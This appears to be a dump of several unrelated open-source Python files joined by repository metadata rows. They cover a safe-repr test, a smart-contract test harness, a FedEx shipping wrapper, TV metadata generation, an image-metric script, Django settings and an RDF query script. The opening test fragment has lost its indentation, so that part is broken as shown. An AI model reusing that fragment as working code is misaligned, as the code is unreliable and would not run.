c1_expect2 = '[' + ', '.join(str(j) for j in range(self.maxcollection[1] - 1)) + ', ...]'
c2_expect = '[' + ', '.join(c1_expect2 for _ in range(self.maxcollection[0] - 1)) + ', ...]'
test(c2, c2_expect)
# Ensure dict keys and values are limited correctly
d1 = {}
d1_key = 'a' * self.maxstring_inner * 2
d1[d1_key] = d1_key
re_test(d1, "{'a+\.\.\.a+': 'a+\.\.\.a+'}")
d2 = {d1_key : d1}
re_test(d2, "{'a+\.\.\.a+': {'a+\.\.\.a+': 'a+\.\.\.a+'}}")
d3 = {d1_key : d2}
if len(self.maxcollection) == 2:
re_test(d3, "{'a+\.\.\.a+': {'a+\.\.\.a+': {\.\.\.}}}")
else:
re_test(d3, "{'a+\.\.\.a+': {'a+\.\.\.a+': {'a+\.\.\.a+': 'a+\.\.\.a+'}}}")
# Ensure empty dicts work
test({}, '{}')
# Ensure dict keys are sorted
d1 = {}
d1['c'] = None
d1['b'] = None
d1['a'] = None
test(d1, "{'a': None, 'b': None, 'c': None}")
if sys.version_info >= (3, 0):
# Ensure dicts with unsortable keys do not crash
d1 = {}
for _ in range(100):
d1[object()] = None
try:
list(sorted(d1))
assert False, "d1.keys() should be unorderable"
except TypeError:
pass
self(d1)
# Test with objects with broken repr implementations
class TestClass(object):
def __repr__(self):
raise NameError
try:
repr(TestClass())
assert False, "TestClass().__repr__ should have thrown"
except NameError:
pass
self(TestClass())
# Test with objects with long repr implementations
class TestClass(object):
repr_str = '<' + 'A' * self.maxother_outer * 2 + '>'
def __repr__(self):
return self.repr_str
re_test(TestClass(), r'\<A+\.\.\.A+\>')
# Test collections that don't override repr
class TestClass(dict): pass
test(TestClass(), '{}')
class TestClass(list): pass
test(TestClass(), '[]')
# Test collections that override repr
class TestClass(dict):
def __repr__(self): return 'MyRepr'
test(TestClass(), 'MyRepr')
class TestClass(list):
def __init__(self, iter = ()): list.__init__(self, iter)
def __repr__(self): return 'MyRepr'
test(TestClass(), 'MyRepr')
# Test collections and iterables with long repr
test(TestClass(xrange(0, 15)), 'MyRepr')
test(TestClass(xrange(0, 16)), '<TestClass, len() = 16>')
test(TestClass([TestClass(xrange(0, 10))]), 'MyRepr')
test(TestClass([TestClass(xrange(0, 11))]), '<TestClass, len() = 1>')
# Test strings inside long iterables
test(TestClass(['a' * (self.maxcollection[1] + 1)]), 'MyRepr')
test(TestClass(['a' * (self.maxstring_inner + 1)]), '<TestClass, len() = 1>')
# Test range
if sys.version[0] == '2':
range_name = 'xrange'
else:
range_name = 'range'
test(xrange(1, self.maxcollection[0] + 1), '%s(1, %s)' % (range_name, self.maxcollection[0] + 1))
# Test directly recursive collections
c1 = [1, 2]
c1.append(c1)
test(c1, '[1, 2, [...]]')
d1 = {1: None}
d1[2] = d1
test(d1, '{1: None, 2: {...}}')
# Find the largest possible repr and ensure it is below our arbitrary
# limit (8KB).
coll = '-' * (self.maxstring_outer * 2)
for limit in reversed(self.maxcollection[1:]):
coll = [coll] * (limit * 2)
dcoll = {}
for i in range(self.maxcollection[0]):
dcoll[str(i) * self.maxstring_outer] = coll
text = self(dcoll)
#try:
# text_repr = repr(dcoll)
#except MemoryError:
# print('Memory error raised while creating repr of test data')
# text_repr = ''
#print('len(SafeRepr()(dcoll)) = ' + str(len(text)) + ', len(repr(coll)) = ' + str(len(text_repr)))
assert len(text) < 8192
# Test numpy types - they should all use their native reprs, even arrays exceeding limits
try:
import numpy as np
except ImportError:
print('WARNING! could not import numpy - skipping all numpy tests.')
else:
test(np.int32(123), repr(np.int32(123)))
test(np.float64(123.456), repr(np.float64(123.456)))
test(np.zeros(self.maxcollection[0] + 1), repr(np.zeros(self.maxcollection[0] + 1)));
if __name__ == '__main__':
print('Running tests...')
SafeRepr()._selftest()
| bsd-3-clause | -7,209,905,003,792,995,000 | 35.356577 | 134 | 0.540081 | false | 3.914178 | true | false | false |
rtmilbourne/augur-core | tests/fixedpoint_tests/test_suite.py | 4 | 2236 | import cStringIO
import sys
_ = sys.stderr
sys.stderr = cStringIO.StringIO()
from pyethereum import tester as t
sys.stderr = _
from contextlib import contextmanager
from collections import namedtuple
from bitcoin import encode, decode
import random
import gmpy2
import time
gmpy2.get_context().precision = 256
_TestResultBase = namedtuple('_TestResultBase', 'avg_error avg_gas')
class TestResults(_TestResultBase):
def __str__(self):
return 'TestResults(avg_error={:3.18%}%, avg_gas={})'.format(self[0], self[1])
def suppress_output(thunk):
old_stdout = sys.stdout
sys.stdout = cStringIO.StringIO()
try:
result = thunk()
except:
old_stdout.write(sys.stdout.read())
sys.exit(1)
else:
sys.stdout = old_stdout
return result
def printf(fmt, *args):
sys.stdout.write(fmt % args)
sys.stdout.flush()
def test_thunk(thunk, trials):
printf('Testing ' + thunk.__name__ + ':\n')
error = 0
gas = 0
for i in range(int(trials)):
printf('\tTrials: %d\r', i)
expected, result = thunk()
result['output'] /= gmpy2.mpfr(1 << 64)
error += abs(result['output'] - expected)/expected
gas += result['gas']
printf('\n')
return TestResults(float(error/trials), gas/float(trials))
def thunks(contract, func_dict):
for name, (bounds, ref_func) in func_dict.items():
def thunk(name=name, bounds=bounds, ref_func=ref_func):
test_func = vars(contract)[name]
x = random.random()*(bounds[1] - bounds[0]) + bounds[0]
return ref_func(x), test_func(int(x*2**64), profiling=True)
thunk.__name__ = name
yield thunk
def compile(filename):
s = t.state()
start = time.time()
printf('Compiling...\t')
c = suppress_output(lambda: s.abi_contract(filename))
printf('Done in %.1f seconds.\n', time.time() - start)
return c
def test_code(filename, func_dict, trials):
contract = compile(filename)
for thunk in thunks(contract, func_dict):
printf('\t' + str(test_thunk(thunk, trials)) + '\n')
@contextmanager
def timer():
start = time.time()
yield
print
print "Runtime: %.2f seconds" % (time.time() - start)
| gpl-3.0 | 2,710,647,747,908,694,000 | 26.95 | 86 | 0.624329 | false | 3.302806 | true | false | false |
ryepdx/shipping_api_fedex | helpers/fedex_wrapper.py | 1 | 8884 | import base64, logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
from collections import namedtuple
from shipping import Package, get_country_code
from .fedex.services.rate_service import FedexRateServiceRequest
from .fedex.services.ship_service import FedexDeleteShipmentRequest, FedexProcessShipmentRequest
PACKAGES = [
('FEDEX_BOX', 'FedEx Box'),
('FEDEX_PAK', 'FedEx Pak'),
('FEDEX_TUBE', 'FedEx Tube'),
('YOUR_PACKAGING', 'Custom')
]
SERVICES = [
('STANDARD_OVERNIGHT', 'FedEx Standard Overnight'),
('PRIORITY_OVERNIGHT', 'FedEx Priority Overnight'),
('FEDEX_GROUND', 'FedEx Ground'),
('FEDEX_EXPRESS_SAVER', 'FedEx Express Saver')
]
Label = namedtuple("Label", ["tracking", "postage", "label", "format"])
class FedExError(Exception):
pass
class FedEx(object):
def __init__(self, config):
self.config = config
def _prepare_request(self, request, shipper, recipient, package):
request.RequestedShipment.DropoffType = 'REQUEST_COURIER'
request.RequestedShipment.PackagingType = 'YOUR_PACKAGING'#package.shape.code
# Shipper contact info.
#request.RequestedShipment.Shipper.Contact.PersonName = shipper.name or shipper.company_name
request.RequestedShipment.Shipper.Contact.CompanyName = shipper.company_name or shipper.name
request.RequestedShipment.Shipper.Contact.PhoneNumber = shipper.phone
# Shipper address.
request.RequestedShipment.Shipper.Address.StreetLines = [shipper.address1, shipper.address2]
request.RequestedShipment.Shipper.Address.City = shipper.city
request.RequestedShipment.Shipper.Address.StateOrProvinceCode = shipper.state
request.RequestedShipment.Shipper.Address.PostalCode = shipper.zip
request.RequestedShipment.Shipper.Address.CountryCode = shipper.country_code
request.RequestedShipment.Shipper.Address.Residential = False
# Recipient contact info.
request.RequestedShipment.Recipient.Contact.PersonName = recipient.name or recipient.company_name
request.RequestedShipment.Recipient.Contact.CompanyName = recipient.company_name or ''
request.RequestedShipment.Recipient.Contact.PhoneNumber = recipient.phone
# Recipient address
request.RequestedShipment.Recipient.Address.StreetLines = [recipient.address1, recipient.address2]
request.RequestedShipment.Recipient.Address.City = recipient.city
request.RequestedShipment.Recipient.Address.StateOrProvinceCode = recipient.state
request.RequestedShipment.Recipient.Address.PostalCode = recipient.zip
request.RequestedShipment.Recipient.Address.CountryCode = recipient.country_code
# This is needed to ensure an accurate rate quote with the response.
request.RequestedShipment.Recipient.Address.Residential = recipient.is_residence
request.RequestedShipment.EdtRequestType = 'NONE'
# Who pays for the shipment?
# RECIPIENT, SENDER or THIRD_PARTY
request.RequestedShipment.ShippingChargesPayment.PaymentType = 'SENDER'
wsdl_package = request.create_wsdl_object_of_type('RequestedPackageLineItem')
wsdl_package.PhysicalPackaging = 'BOX'
wsdl_package.Weight = request.create_wsdl_object_of_type('Weight')
wsdl_package.Weight.Value = round(package.weight_in_lbs, 2)
wsdl_package.Weight.Units = 'LB'
#wsdl_package.Dimensions = request.create_wsdl_object_of_type('Dimensions')
#wsdl_package.Dimensions.Length = package.length
#wsdl_package.Dimensions.Width = package.width
#wsdl_package.Dimensions.Height = package.height
#wsdl_package.Dimensions.Units = 'IN'
request.add_package(wsdl_package)
return request
def rate(self, package, shipper, recipient, insurance='OFF', insurance_amount=0, delivery_confirmation=False, signature_confirmation=False):
response = {'info': []}
# Play nice with the other function signatures, which expect to take lists of packages.
if not isinstance(package, Package):
# But not too nice.
if len(package) > 1:
raise Exception("Can only take one Package at a time!")
package = package[0]
shipper.country_code = get_country_code(shipper.country)
recipient.country_code = get_country_code(recipient.country)
rate_request = FedexRateServiceRequest(self.config)
rate_request = self._prepare_request(rate_request, shipper, recipient, package)
rate_request.RequestedShipment.ServiceType = None
rate_request.RequestedShipment.EdtRequestType = 'NONE'
rate_request.RequestedShipment.PackageDetail = 'INDIVIDUAL_PACKAGES'
rate_request.RequestedShipment.ShippingChargesPayment.Payor.AccountNumber = self.config.account_number
seen_quotes = []
try:
rate_request.send_request()
for service in rate_request.response.RateReplyDetails:
for detail in service.RatedShipmentDetails:
response['info'].append({
'service': service.ServiceType,
'package': service.PackagingType,
'delivery_day': '',
'cost': float(detail.ShipmentRateDetail.TotalNetFedExCharge.Amount)
})
except Exception as e:
raise FedExError(e)
return response
def label(self, package, shipper, recipient, customs=None, image_format="PNG"):
shipper.country_code = get_country_code(shipper.country)
recipient.country_code = get_country_code(recipient.country)
shipment = self._prepare_request(FedexProcessShipmentRequest(self.config), shipper, recipient, package)
shipment.RequestedShipment.ServiceType = package.mail_class
shipment.RequestedShipment.ShippingChargesPayment.Payor.ResponsibleParty.AccountNumber = self.config.account_number
# Specifies the label type to be returned.
# LABEL_DATA_ONLY or COMMON2D
shipment.RequestedShipment.LabelSpecification.LabelFormatType = 'COMMON2D'
# Specifies which format the label file will be sent to you in.
# DPL, EPL2, PDF, PNG, ZPLII
shipment.RequestedShipment.LabelSpecification.ImageType = image_format
shipment.RequestedShipment.LabelSpecification.LabelStockType = 'STOCK_4X6' if image_format == 'EPL2' else 'PAPER_4X6'
shipment.RequestedShipment.LabelSpecification.LabelPrintingOrientation = 'BOTTOM_EDGE_OF_TEXT_FIRST'
if customs:
customs_label = shipment.create_wsdl_object_of_type('AdditionalLabelsDetail')
customs_label.Type = 'CUSTOMS'
customs_label.Count = 1
shipment.AdditionalLabels.append(customs_label)
wsdl_customs = shipment.create_wsdl_object_of_type('CustomsClearanceDetail')
wsdl_customs.CustomsValue = shipment.create_wsdl_object_of_type('Money')
wsdl_customs.CustomsValue.Currency = 'USD'
wsdl_customs.CustomsValue.Amount = package.value
for item in sorted(customs.items, key=lambda i: i.value, reverse=True):
wsdl_item = shipment.create_wsdl_object_of_type('Commodity')
wsdl_item.CustomsValue = shipment.create_wsdl_object_of_type('Money')
wsdl_item.CustomsValue.Amount = item.value
wsdl_item.CustomsValue.Currency = 'USD'
wsdl_item.NumberOfPieces = item.quantity
wsdl_item.CountryOfManufacture = item.country_of_origin
wsdl_item.Description = item.description
wsdl_item.Weight = round(item.weight, 2)
wsdl_customs.Commodities.append(wsdl_item)
shipment.CustomsClearanceDetail = wsdl_customs
try:
shipment.send_request()
except Exception as e:
return {"error": str(e)}
tracking = shipment.response.CompletedShipmentDetail.CompletedPackageDetails[0].TrackingIds[0].TrackingNumber
net_cost = shipment.response.CompletedShipmentDetail.CompletedPackageDetails[0].PackageRating.PackageRateDetails[0].NetCharge.Amount
return Label(
postage=net_cost, tracking=tracking, format=[image_format],
label=[base64.b64decode(shipment.response.CompletedShipmentDetail.CompletedPackageDetails[0].Label.Parts[0].Image)]
)
def cancel(self, tracking_no, **kwargs):
delete = FedexDeleteShipmentRequest(self.config)
delete.DeletionControlType = "DELETE_ALL_PACKAGES"
delete.TrackingId.TrackingNumber = tracking_no
try:
delete.send_request()
return delete.response
except Exception as e:
raise FedExError(e) | agpl-3.0 | 4,817,629,897,485,987,000 | 44.798969 | 144 | 0.688766 | false | 3.937943 | true | false | false |
Vagab0nd/SiCKRAGE | sickchill/providers/metadata/wdtv.py | 1 | 8505 | import datetime
import os
import re
from xml.etree import ElementTree
from sickchill.helper.common import dateFormat, replace_extension
from sickchill.oldbeard import helpers
from ... import logger
from . import generic
class WDTVMetadata(generic.GenericMetadata):
"""
Metadata generation class for WDTV
The following file structure is used:
show_root/folder.jpg (poster)
show_root/Season ##/folder.jpg (season thumb)
show_root/Season ##/filename.ext (*)
show_root/Season ##/filename.metathumb (episode thumb)
show_root/Season ##/filename.xml (episode metadata)
"""
def __init__(
self, show_metadata=False, episode_metadata=False, fanart=False, poster=False, banner=False, episode_thumbnails=False,
season_posters=False, season_banners=False, season_all_poster=False, season_all_banner=False
):
super().__init__(
show_metadata, episode_metadata, fanart, poster, banner, episode_thumbnails, season_posters, season_banners, season_all_poster, season_all_banner
)
self.name = 'WDTV'
self._ep_nfo_extension = 'xml'
self.poster_name = "folder.jpg"
# web-ui metadata template
self.eg_show_metadata = "<i>not supported</i>"
self.eg_episode_metadata = "Season##\\<i>filename</i>.xml"
self.eg_fanart = "<i>not supported</i>"
self.eg_poster = "folder.jpg"
self.eg_banner = "<i>not supported</i>"
self.eg_episode_thumbnails = "Season##\\<i>filename</i>.metathumb"
self.eg_season_posters = "Season##\\folder.jpg"
self.eg_season_banners = "<i>not supported</i>"
self.eg_season_all_poster = "<i>not supported</i>"
self.eg_season_all_banner = "<i>not supported</i>"
# Override with empty methods for unsupported features
def retrieveShowMetadata(self, folder):
# no show metadata generated, we abort this lookup function
return None, None, None
def create_show_metadata(self, show_obj):
pass
def update_show_indexer_metadata(self, show_obj):
pass
def get_show_file_path(self, show_obj):
pass
def create_fanart(self, show_obj):
pass
def create_banner(self, show_obj):
pass
def create_season_banners(self, show_obj):
pass
def create_season_all_poster(self, show_obj):
pass
def create_season_all_banner(self, show_obj):
pass
@staticmethod
def get_episode_thumb_path(ep_obj):
"""
Returns the path where the episode thumbnail should be stored. Defaults to
the same path as the episode file but with a .metathumb extension.
ep_obj: a TVEpisode instance for which to create the thumbnail
"""
if os.path.isfile(ep_obj.location):
tbn_filename = replace_extension(ep_obj.location, 'metathumb')
else:
return None
return tbn_filename
@staticmethod
def get_season_poster_path(show_obj, season):
"""
Season thumbs for WDTV go in Show Dir/Season X/folder.jpg
If no season folder exists, None is returned
"""
dir_list = [x for x in os.listdir(show_obj.location) if
os.path.isdir(os.path.join(show_obj.location, x))]
season_dir_regex = r'^Season\s+(\d+)$'
season_dir = None
for cur_dir in dir_list:
if season == 0 and cur_dir == "Specials":
season_dir = cur_dir
break
match = re.match(season_dir_regex, cur_dir, re.I)
if not match:
continue
cur_season = int(match.group(1))
if cur_season == season:
season_dir = cur_dir
break
if not season_dir:
logger.debug("Unable to find a season dir for season " + str(season))
return None
logger.debug("Using " + str(season_dir) + "/folder.jpg as season dir for season " + str(season))
return os.path.join(show_obj.location, season_dir, 'folder.jpg')
def _ep_data(self, ep_obj):
"""
Creates an elementTree XML structure for a WDTV style episode.xml
and returns the resulting data object.
ep_obj: a TVShow instance to create the NFO for
"""
eps_to_write = [ep_obj] + ep_obj.relatedEps
myShow = ep_obj.idxr.series_from_episode(ep_obj)
rootNode = ElementTree.Element("details")
# write an WDTV XML containing info for all matching episodes
for curEpToWrite in eps_to_write:
myEp = curEpToWrite.idxr.episode(curEpToWrite)
if not myEp:
logger.info("Metadata writer is unable to find episode {0:d}x{1:d} of {2} on {3}..."
"has it been removed? Should I delete from db?".format(
curEpToWrite.season, curEpToWrite.episode, curEpToWrite.show.name, ep_obj.idxr.name))
return None
if ep_obj.airdate != datetime.date.min and not myEp.get('firstAired'):
myEp["firstAired"] = str(ep_obj.airdate)
if not (myEp.get('episodeName') and myEp.get('firstAired')):
return None
if len(eps_to_write) > 1:
episode = ElementTree.SubElement(rootNode, "details")
else:
episode = rootNode
if myEp.get('id'):
episodeID = ElementTree.SubElement(episode, "id")
episodeID.text = str(myEp['id'])
title = ElementTree.SubElement(episode, "title")
title.text = ep_obj.pretty_name()
if getattr(myShow, 'seriesName', None):
seriesName = ElementTree.SubElement(episode, "series_name")
seriesName.text = myShow.seriesName
if curEpToWrite.name:
episodeName = ElementTree.SubElement(episode, "episode_name")
episodeName.text = curEpToWrite.name
seasonNumber = ElementTree.SubElement(episode, "season_number")
seasonNumber.text = str(curEpToWrite.season)
episodeNum = ElementTree.SubElement(episode, "episode_number")
episodeNum.text = str(curEpToWrite.episode)
firstAired = ElementTree.SubElement(episode, "firstAired")
if curEpToWrite.airdate != datetime.date.min:
firstAired.text = str(curEpToWrite.airdate)
if getattr(myShow, 'firstAired', None):
try:
year_text = str(datetime.datetime.strptime(myShow.firstAired, dateFormat).year)
if year_text:
year = ElementTree.SubElement(episode, "year")
year.text = year_text
except Exception:
pass
if curEpToWrite.season != 0 and getattr(myShow, 'runtime', None):
runtime = ElementTree.SubElement(episode, "runtime")
runtime.text = myShow.runtime
if getattr(myShow, 'genre', None):
genre = ElementTree.SubElement(episode, "genre")
genre.text = " / ".join(myShow.genre)
if myEp.get('directors') and isinstance(myEp['directors'], list):
for director in myEp['directors']:
director_element = ElementTree.SubElement(episode, "director")
director_element.text = director
data = ep_obj.idxr.actors(myShow)
for actor in data:
if not ('name' in actor and actor['name'].strip()):
continue
cur_actor = ElementTree.SubElement(episode, "actor")
cur_actor_name = ElementTree.SubElement(cur_actor, "name")
cur_actor_name.text = actor['name']
if 'role' in actor and actor['role'].strip():
cur_actor_role = ElementTree.SubElement(cur_actor, "role")
cur_actor_role.text = actor['role'].strip()
if curEpToWrite.description:
overview = ElementTree.SubElement(episode, "overview")
overview.text = curEpToWrite.description
# Make it purdy
helpers.indentXML(rootNode)
data = ElementTree.ElementTree(rootNode)
return data
# present a standard "interface" from the module
metadata_class = WDTVMetadata
| gpl-3.0 | -1,577,157,463,934,966,500 | 34 | 157 | 0.585303 | false | 4.055794 | false | false | false |
domoritz/label_generator | rate.py | 1 | 3246 | """Calculate the difference between predictions and ground truth.
Provide a list of predicted files. In the same directory should
also be the label files. This script assumes correct filenames.
Usage:
main.py LIST [--thresh=THRESH] [--debug]
main.py (-h | --help)
main.py --version
Options:
--thresh=THRESH Threshold for predicted image [default: 200].
--debug Write debug output.
-h --help Show this screen.
--version Show version.
"""
import logging
import os.path
import numpy as np
import cv2
from docopt import docopt
DEBUG = False
def calculate_diff(label_list, thresh):
with open(label_list) as f:
all_fp = 0.0
all_fn = 0.0
all_tp = 0.0
where = os.path.dirname(label_list)
for line in f:
pred = os.path.join(where, line.strip())
fname = os.path.basename(
pred)[:-14] + "-label.png"
truth = os.path.join(where, fname)
if not os.path.isfile(pred) or not os.path.isfile(truth):
print("Not found:", pred, truth)
continue
truth = cv2.imread(truth, cv2.CV_LOAD_IMAGE_GRAYSCALE)
pred = cv2.imread(pred, cv2.CV_LOAD_IMAGE_GRAYSCALE)
# resize to predicted image size
h, w = pred.shape
truth = cv2.resize(truth, (w, h))
# threshold to get bw image
_, pred = cv2.threshold(pred, thresh, 255, cv2.THRESH_BINARY)
# threshold because of scaling interpolation
_, truth = cv2.threshold(truth, 127, 255, cv2.THRESH_BINARY)
# dilate to account for almost right predictions (see alternative below)
kernel = np.ones((3, 3), np.uint8)
truth_dil = cv2.dilate(truth, kernel, iterations=3)
pred_dil = cv2.dilate(pred, kernel, iterations=3)
# no dilation
# truth_dil = truth
# pred_dil = pred
fp = np.sum(pred - truth_dil)
fn = np.sum(truth - pred_dil)
tp = np.sum(cv2.bitwise_and(pred, truth))
all_fp += fp
all_fn += fn
all_tp += tp
if DEBUG:
print(fn, fp, tp)
cv2.imshow('truth', truth)
cv2.imshow('predicted', pred)
cv2.imshow('fp', pred - truth_dil)
cv2.imshow('fn', truth - pred_dil)
cv2.imshow('tp', cv2.bitwise_and(pred, truth))
cv2.moveWindow('truth', 100, 10)
cv2.moveWindow('predicted', 300, 10)
cv2.waitKey(0)
cv2.destroyAllWindows()
print("Shape:", h, w)
print(all_fp, all_fn, all_tp)
precision = all_tp / (all_tp + all_fp)
recall = all_tp / (all_tp + all_fn)
print("Precision:", precision)
print("Recall:", recall)
print("F1 score:", 2 * precision * recall / (precision + recall))
if __name__ == '__main__':
arguments = docopt(__doc__, version='Tester 1.0')
if arguments['--debug']:
logging.basicConfig(level=logging.DEBUG)
DEBUG = True
calculate_diff(arguments['LIST'],
int(arguments['--thresh']))
| bsd-3-clause | 4,731,531,660,132,277,000 | 28.243243 | 84 | 0.544054 | false | 3.783217 | false | false | false |
CorneliusIV/playlistdc | playlistdc/settings.py | 1 | 3770 | """
Django settings for playlistdc project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
import os
import dj_database_url
from decouple import config
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
PROJECT_ROOT = os.path.dirname(BASE_DIR)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=True, cast=bool)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', default='',
cast=lambda v: [s.strip() for s in v.split(',')])
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_rq',
'playlistdc'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
if config('DEBUG', cast=bool, default=DEBUG):
INSTALLED_APPS.extend([
'debug_toolbar',
])
MIDDLEWARE.append(
'debug_toolbar.middleware.DebugToolbarMiddleware')
ROOT_URLCONF = 'playlistdc.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'debug': config('TEMPLATE_DEBUG', default=DEBUG, cast=bool),
},
},
]
WSGI_APPLICATION = 'playlistdc.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': dj_database_url.config(conn_max_age=600),
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
USE_I18N = True
TIME_ZONE = 'America/New_York'
USE_L10N = False
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'public', 'static')
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
# Media
MEDIA_ROOT = os.path.join(BASE_DIR, 'public', 'media')
# SSL
SECURE_SSL_REDIRECT = config('SECURE_SSL_REDIRECT', default=False, cast=bool)
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
SESSION_COOKIE_SECURE = SECURE_SSL_REDIRECT
CSRF_COOKIE_SECURE = SECURE_SSL_REDIRECT
# rq
RQ_QUEUES = {
'default': {
'URL': config('REDIS_URL', default='redis://localhost:6379/0'),
},
'high': {
'URL': config('REDIS_URL', default='redis://localhost:6379/0'),
},
'low': {
'URL': config('REDIS_URL', default='redis://localhost:6379/0'),
},
}
# Spotify
SPOTIPY_CLIENT_ID = config('SPOTIPY_CLIENT_ID')
SPOTIPY_CLIENT_SECRET = config('SPOTIPY_CLIENT_SECRET')
SPOTIPY_REDIRECT_URI = config('SPOTIPY_REDIRECT_URI')
| mit | -3,622,044,227,207,103,500 | 25.180556 | 77 | 0.680637 | false | 3.402527 | true | false | false |
rsoscia/BAMS-to-NeuroLex | src/ProgressReport.py | 1 | 7486 | # ProgressReport.py
# Progress Report For Zaid
#This is an all encompassing program that does everything at once, hopefully placing all
#of the BAMS query results into a single CSV file
#doesn't run properly unless the path is accessed first, interactive python is activated,
#and the code is pasted into terminal..
#Only run the below persist section once:
#Persist Begin
#For Parsing
import rdflib
from rdflib import plugin
#for getting the length of the files
import os
#for working with tempfiles
import os.path as op
import tempfile
#For Unzipping
import zipfile
from StringIO import StringIO
plugin.register(
'sparql', rdflib.query.Processor,
'rdfextras.sparql.processor', 'Processor')
plugin.register(
'sparql', rdflib.query.Result,
'rdfextras.sparql.query', 'SPARQLQueryResult')
zipdata = StringIO()
# open the file using a relative path
#r = open("../Data/BAMS1.zip")
# adding the BAMS Thesaurus instead of the more limited set of data:
#r = open("../Data/bams_thesaurus_2013-09-24_17-12-40.xml.zip")
# Fixed RDF
r = open("../Data/bams_thesaurus_2013-10-06_14-58-56.xml.zip")
#ADDITIONAL CONTENT
#r = open("../Data/bams_ontology_2013-10-16_20-34-52.xml.zip")
# zipdata is a buffer holding the contents of the zip file in memory
zipdata.write(r.read())
print("~40 seconds for zip to open...")
#myzipfile opens the contents of the zip file as an object that knows how to unzip
myzipfile = zipfile.ZipFile(zipdata)
#grab the contents out of myzipfile by name
#foofile = myzipfile.open('bams_ontology_2013-07-10_03-20-00.xml')
#changing the foofile to be the file we upen above^^^^^ in r = open()....etc.
#foofile = myzipfile.open('bams_thesaurus_2013-09-24_17-12-40.xml')
# Fixed RDF
foofile = myzipfile.open('bams_thesaurus_2013-10-06_14-58-56.xml')
#ADDITIONAL CONTENT
#foofile = myzipfile.open('bams_ontology_2013-10-16_20-34-52.xml')
print("loading up the BAMS file in memory...")
#Get a Graph object using a Sleepycat persistent store
g = rdflib.Graph('Sleepycat',identifier='BAMS')
# first time create the store
# put the store in a temp directory so it doesn't get confused with stuff we should commit
tempStore = op.join( tempfile.gettempdir(), 'myRDF_BAMS_Store')
g.open(tempStore, create = True)
#pull in the BAMS RDF document, parse, and store.
#result = g.parse(file=myzipfile.open('bams_ontology_2013-07-10_03-20-00.xml'), format="application/rdf+xml")
#do the same thing but with the BAMS thesaurus file
#result = g.parse(file=myzipfile.open('bams_thesaurus_2013-09-24_17-12-40.xml'), format="application/rdf+xml")
# Fixed RDF
result = g.parse(file=myzipfile.open('bams_thesaurus_2013-10-06_14-58-56.xml'), format="application/rdf+xml")
#ADDITIONAL CONTENT
#result = g.parse(file=myzipfile.open('bams_ontology_2013-10-16_20-34-52.xml'), format="application/rdf+xml")
foofile.close()
# when done!
g.close()
print("Graph stored to disk")
#WORKS PERFECTLY
#Persist End
#########################################################################################
#For Parsing
import rdflib
from rdflib import plugin
#for getting the length of the files
import os
#for working with tempfiles
import os.path as op
import tempfile
#for csv output
import csv
plugin.register(
'sparql', rdflib.query.Processor,
'rdfextras.sparql.processor', 'Processor')
plugin.register(
'sparql', rdflib.query.Result,
'rdfextras.sparql.query', 'SPARQLQueryResult')
#Get a Graph object
g = rdflib.Graph('Sleepycat',identifier='BAMS')
print("loading up the BAMS file in memory...")
# assumes myRDF_BAMS_Store has been created
tempStore = op.join( tempfile.gettempdir(), 'myRDF_BAMS_Store')
g.open(tempStore)
print("going to get results...")
print("The graph has " + str(len(g)) + " items in it")
#BAMS Thesaurus content has 3797 items in it
#additional BAMS content (graph) has 167178 items in it
# CHOOSE ONE OF THE FOLLOWING QUERIES
#########################################################################################
#BASAL GANGLIA OF TELENCEPHALON QUERY:
qres = g.query(
"""PREFIX bamsProp: <http://brancusi1.usc.edu/RDF/>
SELECT ?subject ?predicate ?object
WHERE {
?subject bamsProp:entry "Basal ganglia of telencephalon" .
?subject ?predicate ?object
}""")
#########################################################################################
#// Basal Ganglia Query:
#// Good For Testing Purposes
#BASAL GANGLIA QUERY:
qres = g.query(
"""PREFIX bamsProp: <http://brancusi1.usc.edu/RDF/>
SELECT ?subject ?predicate ?object
WHERE {
?subject bamsProp:entry "Basal ganglia" .
?subject ?predicate ?object
}""")
for r in qres.result:
print str(r[0]), str(r[1]), str(r[2])
# Open/Write CSV file
# (Copy) Experimental -- best working yet
#########################################################################################
with open('Progress_Report.csv', 'wb') as f:
BAMS_Dict = {"Subject": qres.result[0][0], "Predicate": qres.result[0][1], "Object": qres.result[0][2]}
w = csv.DictWriter(f, BAMS_Dict.keys())
w.writeheader()
w.writerow(BAMS_Dict)
for r in qres.result:
c = csv.writer(open("Progress_Report.csv","wb"))
c.writerows(qres.result)
#########################################################################################
# CSV File Generated Containing BAMS Data From Queries
#########################################################################################
for r in qres.result:
#print str(r[0]), str(r[1]), str(r[2])
#print str(r[0][0]) #gives the first position in the first tripple "h" for the url
#c = csv.writer(open("BAMS_Thesaurus_Data4Upload.csv","wb"))
